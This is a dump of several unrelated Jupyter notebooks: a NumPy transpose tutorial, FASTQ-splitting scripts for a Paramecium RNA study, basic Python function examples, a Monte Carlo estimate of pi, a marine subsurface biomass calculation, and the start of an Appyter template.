"_____no_output_____"
]
],
[
[
"### Matrix Transpose\nIf the original matrix is not a square then transpose changes its shape, technically we are swapping\ne.g. 2x4 matrix to 4x2",
"_____no_output_____"
],
[
"#### Rule of thumb: you can transpose for matrix multiplication if the data in the original matrices was arranged in rows but doesn't always apply \nStop and really think what is in your matrices and which should interact with each other",
"_____no_output_____"
]
],
[
[
"m = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])\nprint(m)\nprint(m.shape)",
"[[ 1 2 3 4]\n [ 5 6 7 8]\n [ 9 10 11 12]]\n(3, 4)\n"
]
],
[
[
"NumPy does this without actually moving any data in memory - \nit simply changes the way it indexes the original matrix - so it’s quite efficient.",
"_____no_output_____"
]
],
[
[
"# let's do a transpose\nm.T",
"_____no_output_____"
],
[
"# be careful with modifying data\nm_t = m.T\nm_t[3][1] = 200\nm_t",
"_____no_output_____"
]
],
[
[
"Notice how it modified both the transpose and the original matrix, too! ",
"_____no_output_____"
]
],
[
[
"m",
"_____no_output_____"
]
],
[
[
"#### Real case example",
"_____no_output_____"
]
],
[
[
"# we have two matrices inputs and weights (essential concepts for Neural Networks)\ninputs = np.array([[-0.27, 0.45, 0.64, 0.31]])\nprint(inputs)\ninputs.shape",
"[[-0.27 0.45 0.64 0.31]]\n"
],
[
"weights = np.array([[0.02, 0.001, -0.03, 0.036], \\\n [0.04, -0.003, 0.025, 0.009], [0.012, -0.045, 0.28, -0.067]])\nprint(weights)\nweights.shape",
"[[ 0.02 0.001 -0.03 0.036]\n [ 0.04 -0.003 0.025 0.009]\n [ 0.012 -0.045 0.28 -0.067]]\n"
],
[
"# let's try to do a matrix multiplication\nnp.matmul(inputs, weights)",
"_____no_output_____"
]
],
[
[
"What happened was that our matrices were not compatible because the columns from our left matrix didn't equal the number of rows from the right matrix. So what do we do? We transpose but which one? That depends on what shape we want.",
"_____no_output_____"
]
],
[
[
"np.matmul(inputs, weights.T)",
"_____no_output_____"
],
[
"# in order for this to work we have to swap the order of our matrices\nnp.matmul(weights, inputs.T)",
"_____no_output_____"
]
],
[
[
"The two answers are transposes of each other, so which multiplication you use really just depends on the shape you want for the output.",
"_____no_output_____"
],
[
"### Numpy exercises",
"_____no_output_____"
]
],
[
[
"def prepare_inputs(inputs):\n # TODO: create a 2-dimensional ndarray from the given 1-dimensional list;\n # assign it to input_array\n input_array = np.array([inputs])\n \n # TODO: find the minimum value in input_array and subtract that\n # value from all the elements of input_array. Store the\n # result in inputs_minus_min\n inputs_minus_min = input_array - input_array.min()\n\n # TODO: find the maximum value in inputs_minus_min and divide\n # all of the values in inputs_minus_min by the maximum value.\n # Store the results in inputs_div_max.\n inputs_div_max = inputs_minus_min / inputs_minus_min.max()\n\n # return the three arrays we've created\n return input_array, inputs_minus_min, inputs_div_max\n \n\ndef multiply_inputs(m1, m2):\n # TODO: Check the shapes of the matrices m1 and m2. \n # m1 and m2 will be ndarray objects.\n #\n # Return False if the shapes cannot be used for matrix\n # multiplication. You may not use a transpose\n if m1.shape[0] != m2.shape[1] and m1.shape[1] != m2.shape[0]:\n return False\n # TODO: If you have not returned False, then calculate the matrix product\n # of m1 and m2 and return it. Do not use a transpose,\n # but you swap their order if necessary\n if m1.shape[1] == m2.shape[0]:\n return np.matmul(m1, m2) \n else:\n return np.matmul(m2, m1) \n \ndef find_mean(values):\n # TODO: Return the average of the values in the given Python list\n return np.mean(values)",
"_____no_output_____"
],
[
"input_array, inputs_minus_min, inputs_div_max = prepare_inputs([-1,2,7])\nprint(\"Input as Array: {}\".format(input_array))\nprint(\"Input minus min: {}\".format(inputs_minus_min))\nprint(\"Input Array: {}\".format(inputs_div_max))\n\nprint(\"Multiply 1:\\n{}\".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1],[2],[3],[4]]))))\nprint(\"Multiply 2:\\n{}\".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1],[2],[3]]))))\nprint(\"Multiply 3:\\n{}\".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1,2]]))))\n\nprint(\"Mean == {}\".format(find_mean([1,3,4])))",
"Input as Array: [[-1 2 7]]\nInput minus min: [[0 3 8]]\nInput Array: [[0. 0.375 1. ]]\nMultiply 1:\nFalse\nMultiply 2:\n[[14]\n [32]]\nMultiply 3:\n[[ 9 12 15]]\nMean == 2.6666666666666665\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
cb2b64148c825db5cc3ad2e6106bd6c1d593c070 | 11,449 | ipynb | Jupyter Notebook | notebooks/Lyna/SplitFastqBySeqLength_WT_E_50Mill.ipynb | VCMason/PyGenToolbox | 3367a9b3df3bdb0223dd9671e9d355b81455fe2f | [
"MIT"
] | null | null | null | notebooks/Lyna/SplitFastqBySeqLength_WT_E_50Mill.ipynb | VCMason/PyGenToolbox | 3367a9b3df3bdb0223dd9671e9d355b81455fe2f | [
"MIT"
] | null | null | null | notebooks/Lyna/SplitFastqBySeqLength_WT_E_50Mill.ipynb | VCMason/PyGenToolbox | 3367a9b3df3bdb0223dd9671e9d355b81455fe2f | [
"MIT"
] | null | null | null | 36.695513 | 230 | 0.636912 | [
[
[
"%load_ext autoreload\n%autoreload 2\nimport datetime\nimport os\nprint(datetime.datetime.now())\n\nfrom pygentoolbox import SplitFastqFileBySeqLength\n# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved\n# from pygentoolbox.Tools import make_circos_karyotype_file\n#dir(pygentoolbox.Tools)\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n2020-07-31 09:54:15.220646\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE.fastq'\n\nSplitFastqFileBySeqLength.main(f)",
"On sequence: 0\nOn sequence: 100000\nOn sequence: 200000\nOn sequence: 300000\nOn sequence: 400000\nOn sequence: 500000\nOn sequence: 600000\nOn sequence: 700000\nOn sequence: 800000\nOn sequence: 900000\nOn sequence: 1000000\nOn sequence: 1100000\nOn sequence: 1200000\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES.fastq\nExample output filename: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES92bp.fastq\nNumber of lines in input file: 5076872\n"
],
[
"%load_ext autoreload\n%autoreload 2\nimport datetime\nimport os\nprint(datetime.datetime.now())\n\nfrom pygentoolbox import FindScanRNAInFastq\n# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved\n# from pygentoolbox.Tools import make_circos_karyotype_file\n#dir(pygentoolbox.Tools)\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n2020-07-31 10:06:24.707129\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES25bp.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'\n\n# currently script assumes UNG signature is at the 5' end of the read\nFindScanRNAInFastq.main(f)\n\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES150bp.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'\n\n# currently script assumes UNG signature is at the 5' end of the read\nFindScanRNAInFastq.main(f)",
"On sequence: 0\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES25bp.fastq\nExample output filename: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES25bp.scnRNA.fastq\nNumber of sequences in input file: 2509\nNumber of sequences in output file: 164\nOn sequence: 0\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES150bp.fastq\nExample output filename: No scnRNA found\nNumber of sequences in input file: 5157\nNumber of sequences in output file: 0\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly26bp.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'\n\n# currently script assumes UNG signature is at the 5' end of the read\nFindScanRNAInFastq.main(f)",
"On sequence: 0\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly26bp.fastq\nExample output filename: No scnRNA found\nNumber of sequences in input file: 37\nNumber of sequences in output file: 0\n"
],
[
"%load_ext autoreload\n%autoreload 2\nimport datetime\nimport os\nprint(datetime.datetime.now())\n\nfrom pygentoolbox import SplitFastqFileBySeqLength\n# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved\n# from pygentoolbox.Tools import make_circos_karyotype_file\n#dir(pygentoolbox.Tools)\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n2020-07-31 08:16:07.285598\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE.fastq'\n\nSplitFastqFileBySeqLength.main(f)",
"On sequence: 0\nOn sequence: 100000\nOn sequence: 200000\nOn sequence: 300000\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly.fastq\nExample output filename: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly100bp.fastq\nNumber of lines in input file: 1257876\n"
],
[
"%load_ext autoreload\n%autoreload 2\nimport datetime\nimport os\nprint(datetime.datetime.now())\n\nfrom pygentoolbox import FindScanRNAInFastq\n# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved\n# from pygentoolbox.Tools import make_circos_karyotype_file\n#dir(pygentoolbox.Tools)\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n2020-07-31 08:18:07.672019\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly25bp.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'\n\n# currently script assumes UNG signature is at the 5' end of the read\nFindScanRNAInFastq.main(f)",
"On sequence: 0\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly25bp.fastq\nExample output filename: No scnRNA found\nNumber of sequences in input file: 39\nNumber of sequences in output file: 0\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b65c8ab058d5d78823e8163056dd5e434d610 | 10,839 | ipynb | Jupyter Notebook | src/notebooks/function.ipynb | hackerphysics/beginning-python | 7f4927fc9e40e6ac10fcb4478e87550378671bc2 | [
"MIT"
] | null | null | null | src/notebooks/function.ipynb | hackerphysics/beginning-python | 7f4927fc9e40e6ac10fcb4478e87550378671bc2 | [
"MIT"
] | null | null | null | src/notebooks/function.ipynb | hackerphysics/beginning-python | 7f4927fc9e40e6ac10fcb4478e87550378671bc2 | [
"MIT"
] | null | null | null | 22.348454 | 889 | 0.443952 | [
[
[
"a = 1\ndir(1)",
"_____no_output_____"
],
[
"a.__name__",
"_____no_output_____"
],
[
"import types\nclass f(types.FunctionType):\n def __add__():\n return 1024",
"_____no_output_____"
],
[
"def foo(x):\n return x, 2*x, 3*x",
"_____no_output_____"
],
[
"\nb = foo(1)\nx,y,z = foo(1)\nx",
"_____no_output_____"
],
[
"def fib(n):\n if n < 1:\n return None\n if n == 1:\n return 1\n elif n == 2:\n return 1\n else:\n return fib(n-1) + fib(n-2)\n\nprint(fib(10))",
"55\n"
],
[
"sum = lambda x,y: x+y\nsum(1,2)",
"_____no_output_____"
],
[
"import math\nsin2 = lambda x: math.sin(x)**2\nsin2(math.pi/2)",
"_____no_output_____"
],
[
"import math\nfuncs = [math.sin, math.cos, math.tan]\n[print(f(0.5)) for f in funcs]",
"0.479425538604203\n0.8775825618903728\n0.5463024898437905\n"
],
[
"def abs_f(fun, x):\n return abs(fun(x))\n \nabs_f(math.sin, -0.5)",
"_____no_output_____"
],
[
"def add_N(n:int):\n def add(x):\n return x + n\n return add\n\nadd_1 = add_N(1)\nadd_1(1) # 2\nadd_1(3) # 4\n\nadd_1024 = add_N(1024)\nadd_1024(3) # 1027",
"_____no_output_____"
],
[
"names = [\"zhang\",\"wang\",\"li\", \"zhao\"]\n\nsorted(names) # ['li', 'wang', 'zhang', 'zhao']\nsorted(names, key=len) # ['li', 'wang', 'zhao', 'zhang']\nsorted(names, key=lambda x: -len(x)) #['zhang', 'wang', 'zhao', 'li']",
"_____no_output_____"
],
[
"names = [\"zhang\",\"wang\",\"li\", \"zhao\"]\nlist(map(lambda x: x + \"#\", names))",
"_____no_output_____"
],
[
"def get_array():\n l = [1,2,3,4]\n return l\n\nfor x in get_array():\n print(x)\n\ndef get_array():\n l = [1,2,3,4]\n for x in l:\n yield x\n \nfor x in get_array():\n print(x)",
"1\n2\n3\n4\n1\n2\n3\n4\n"
],
[
"def get_array():\n arr = [0,1,2,3,4,5,6,7,8,9]\n return arr # 一次返回所有元素\n\nfor x in get_array():\n print(x)\n\ndef get_array():\n n = 0\n while n < 10:\n yield n\n n+=1\n\nfor x in get_array():\n print(x)\n",
"0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b756e56cdb5bb46090ed67d5c7c983ca9929e | 28,305 | ipynb | Jupyter Notebook | plumbing/analysis.ipynb | saloni15495/pro_vis | bd223177b308cc525afdf63a5f0fc36a30e4f7b1 | [
"MIT"
] | 1 | 2021-12-06T11:35:07.000Z | 2021-12-06T11:35:07.000Z | plumbing/analysis.ipynb | saloni15495/pro_vis | bd223177b308cc525afdf63a5f0fc36a30e4f7b1 | [
"MIT"
] | 2 | 2018-10-26T20:17:59.000Z | 2019-01-02T06:40:37.000Z | plumbing/analysis.ipynb | matheushjs/ElfPSP_ParallelABC | 0692adb2a32f1d5780c462a2b4902e311f62e627 | [
"MIT"
] | 2 | 2021-12-05T09:57:59.000Z | 2022-01-23T09:20:54.000Z | 362.884615 | 26,356 | 0.931037 | [
[
[
"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"world = [\n (\"result_seq_quad.out\", \"Quadratic\", \"b\", \"\"),\n (\"result_seq_lin.out\", \"Linear\", \"g\", \"\"),\n (\"result_seq_threads.out\", \"Quadratic + Threads\", \"y\", \"\"),\n (\"result_seq_lin_threads.out\", \"Linear + Threads\", \"cyan\", \"--\"),\n (\"result_seq_cuda.out\", \"Quadratic + CUDA\", \"orange\", \"\")\n]\n\nfor fname, label, c, fmt in world:\n df = pd.read_csv(fname)\n group = df.groupby(by=\"psize\")\n plt.errorbar(group.mean().index, group.mean().values, yerr=group.std().values*2, barsabove=True,\n c=c, label=label, ecolor=\"black\", linewidth=4, fmt=fmt)\n\nplt.ylabel(\"Execution time (s)\")\nplt.xlabel(\"Problem size (# amino acids)\")\nplt.legend()\nplt.savefig(\"fig_all.pdf\")\nplt.savefig(\"fig_all.png\", dpi=150)\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code"
]
] |
cb2b76ed188fc5d5c6c96e1681490216eb6996ad | 3,085 | ipynb | Jupyter Notebook | Monte_Carlo_Integration.ipynb | jvelasq9/Astro_119_Nov_27 | 02b762b1d72269d0f14c95bcc2d6bfceb1b518bb | [
"MIT"
] | null | null | null | Monte_Carlo_Integration.ipynb | jvelasq9/Astro_119_Nov_27 | 02b762b1d72269d0f14c95bcc2d6bfceb1b518bb | [
"MIT"
] | null | null | null | Monte_Carlo_Integration.ipynb | jvelasq9/Astro_119_Nov_27 | 02b762b1d72269d0f14c95bcc2d6bfceb1b518bb | [
"MIT"
] | null | null | null | 19.28125 | 63 | 0.488493 | [
[
[
"## Perform a simple Monte Carlo integration to compute Pi",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"### Set some parameters of the integration",
"_____no_output_____"
]
],
[
[
"n = 10000 #number of samples for the integration",
"_____no_output_____"
]
],
[
[
"### Make some uniformy sampled variables[-1,1]",
"_____no_output_____"
]
],
[
[
"x = np.random.uniform(-1,1,n)\ny = np.random.uniform(-1,1,n)",
"_____no_output_____"
]
],
[
[
"### Find the number of samples within the unit circle",
"_____no_output_____"
]
],
[
[
"ir = np.where((x**2 + y**2)<1.0) [0]\nur = np.where((x**2 + y**2)>=1.0) [0]",
"_____no_output_____"
]
],
[
[
"### Plot the samples and the circle",
"_____no_output_____"
]
],
[
[
"fig = plt.figure(figsize=(7,7))\nplt.xlim(-1.1,1.1)\nplt.ylim(-1.1,1.1)\n\nplt.plot(x[ir], y[ir], '.' , color='blue')\nplt.plot(x[ur],y[ur], '.' , color=\"0.75\")\n\ntheta = np.linspace(0,2*np.pi,1000)\n\nxc = np.cos(theta)\nyc = np.sin(theta)\n\nplt.plot(xc,yc,color='green')\n\nplt.xlabel('x')\nplt.ylabel('y')\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Report the result for Pi",
"_____no_output_____"
]
],
[
[
"pi_approx = 4.0*len(ir)/float(n)\n\nerror_pi = (pi_approx-np.pi)/np.pi\n\nprint(\"Number of sample\", n)\n\nprint(\"Approximate pi\", pi_approx)\n\nprint(\"Error in approx\",error_pi)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2b7fbcb44850c9a2a2c49dfd858218bee0ccde | 7,699 | ipynb | Jupyter Notebook | bacteria_archaea/marine_deep_subsurface/marine_deep_subsurface_prok_biomass_estimate.ipynb | milo-lab/biomass_distribution | 36cf0a80ec94deb73cb560b66cbd9fa190f528ce | [
"MIT"
] | 21 | 2018-05-22T12:09:11.000Z | 2021-11-04T21:04:43.000Z | bacteria_archaea/marine_deep_subsurface/marine_deep_subsurface_prok_biomass_estimate.ipynb | milo-lab/biomass_distribution | 36cf0a80ec94deb73cb560b66cbd9fa190f528ce | [
"MIT"
] | null | null | null | bacteria_archaea/marine_deep_subsurface/marine_deep_subsurface_prok_biomass_estimate.ipynb | milo-lab/biomass_distribution | 36cf0a80ec94deb73cb560b66cbd9fa190f528ce | [
"MIT"
] | 4 | 2019-03-12T08:56:36.000Z | 2020-11-02T14:13:03.000Z | 35.809302 | 333 | 0.516301 | [
[
[
"#Load dependencies\nimport numpy as np\nimport pandas as pd\npd.options.display.float_format = '{:,.1e}'.format\nimport sys\nsys.path.insert(0, '../../statistics_helper')\nfrom CI_helper import *\nfrom excel_utils import *",
"_____no_output_____"
]
],
[
[
"# Estimating the total biomass of marine deep subsurface archaea and bacteria\n\nWe use our best estimates for the total number of marine deep subsurface prokaryotes, the carbon content of marine deep subsurface prokaryotes and the fraction of archaea and bacteria out of the total population of marine deep subsurface prokaryotes to estimate the total biomass of marine deep subsurface bacteria and archaea.",
"_____no_output_____"
]
],
[
[
"results = pd.read_excel('marine_deep_subsurface_prok_biomass_estimate.xlsx')\nresults",
"_____no_output_____"
]
],
[
[
"We multiply all the relevant parameters to arrive at our best estimate for the biomass of marine deep subsurface archaea and bacteria, and propagate the uncertainties associated with each parameter to calculate the uncertainty associated with the estimate for the total biomass.",
"_____no_output_____"
]
],
[
[
"# Calculate the total biomass of marine archaea and bacteria\ntotal_arch_biomass = results['Value'][0]*results['Value'][1]*1e-15*results['Value'][2]\ntotal_bac_biomass = results['Value'][0]*results['Value'][1]*1e-15*results['Value'][3]\n\nprint('Our best estimate for the total biomass of marine deep subsurface archaea is %.0f Gt C' %(total_arch_biomass/1e15))\nprint('Our best estimate for the total biomass of marine deep subsurface bacteria is %.0f Gt C' %(total_bac_biomass/1e15))\n\n# Propagate the uncertainty associated with each parameter to the final estimate\n\narch_biomass_uncertainty = CI_prod_prop(results['Uncertainty'][:3])\nbac_biomass_uncertainty = CI_prod_prop(results.iloc[[0,1,3]]['Uncertainty'])\n\nprint('The uncertainty associated with the estimate for the biomass of archaea is %.1f-fold' %arch_biomass_uncertainty)\nprint('The uncertainty associated with the estimate for the biomass of bacteria is %.1f-fold' %bac_biomass_uncertainty)",
"Our best estimate for the total biomass of marine deep subsurface archaea is 3 Gt C\nOur best estimate for the total biomass of marine deep subsurface bacteria is 7 Gt C\nThe uncertainty associated with the estimate for the biomass of archaea is 7.9-fold\nThe uncertainty associated with the estimate for the biomass of bacteria is 7.6-fold\n"
],
[
"# Feed bacteria results to Table 1 & Fig. 1\nupdate_results(sheet='Table1 & Fig1', \n row=('Bacteria','Marine deep subsurface'), \n col=['Biomass [Gt C]', 'Uncertainty'],\n values=[total_bac_biomass/1e15,bac_biomass_uncertainty],\n path='../../results.xlsx')\n\n# Feed archaea results to Table 1 & Fig. 1\nupdate_results(sheet='Table1 & Fig1', \n row=('Archaea','Marine deep subsurface'), \n col=['Biomass [Gt C]', 'Uncertainty'],\n values=[total_arch_biomass/1e15,arch_biomass_uncertainty],\n path='../../results.xlsx')\n\n# Feed bacteria results to Table S1\nupdate_results(sheet='Table S1', \n row=('Bacteria','Marine deep subsurface'), \n col=['Number of individuals'],\n values= results['Value'][0]*results['Value'][3],\n path='../../results.xlsx')\n\n# Feed archaea results to Table S1\nupdate_results(sheet='Table S1', \n row=('Archaea','Marine deep subsurface'), \n col=['Number of individuals'],\n values= results['Value'][0]*results['Value'][2],\n path='../../results.xlsx')",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2b802957fc599bef9d9cbb9600c2c1196beacd | 64,586 | ipynb | Jupyter Notebook | appyters/SigCom_LINCS_Consensus_Appyter/SigCom LINCS Consensus Appyter.ipynb | MaayanLab/jupyter-template-catalog | 212b455e62d49f04dcee73bb6eeb5312b71ba8ef | [
"Apache-2.0"
] | null | null | null | appyters/SigCom_LINCS_Consensus_Appyter/SigCom LINCS Consensus Appyter.ipynb | MaayanLab/jupyter-template-catalog | 212b455e62d49f04dcee73bb6eeb5312b71ba8ef | [
"Apache-2.0"
] | 11 | 2020-04-15T22:47:17.000Z | 2020-05-28T16:34:16.000Z | appyters/SigCom_LINCS_Consensus_Appyter/SigCom LINCS Consensus Appyter.ipynb | MaayanLab/appyters | 212b455e62d49f04dcee73bb6eeb5312b71ba8ef | [
"Apache-2.0"
] | 1 | 2020-05-14T20:25:32.000Z | 2020-05-14T20:25:32.000Z | 51.056126 | 927 | 0.457158 | [
[
[
"#%%appyter init\nfrom appyter import magic\nmagic.init(lambda _=globals: _())",
"_____no_output_____"
],
[
"%%appyter hide_code\n{% do SectionField(\n name='PRIMARY',\n title='1. Upload your data',\n subtitle='Upload up and down gene-sets to perform two-sided rank enrichment. '+\n 'Upload up- or down-only gene-sets to perform rank analysis for that direction.',\n img='file-upload.png'\n) %}\n{% do SectionField(\n name='ENRICHMENT',\n title='2. Choose libraries for enrichment',\n subtitle='Select the libraries that would be used for consensus analysis, as well as the Enrichr and '+\n 'Drugmonizome libraries to use for enriching the consensus perturbagens.',\n img='find-replace.png'\n \n) %}\n{% do SectionField(\n name='PARAMETER',\n title='3. Tweak the parameters',\n subtitle='Modify the parameters to suit the needs of your analysis.',\n img='hammer-screwdriver.png'\n) %}",
"_____no_output_____"
],
[
"%%appyter markdown\n\n{% set title = StringField(\n name='title',\n label='Notebook Name',\n default='SigCom LINCS Consensus Signatures',\n section=\"PRIMARY\",\n) %}\n\n# {{ title.raw_value }}",
"_____no_output_____"
]
],
[
[
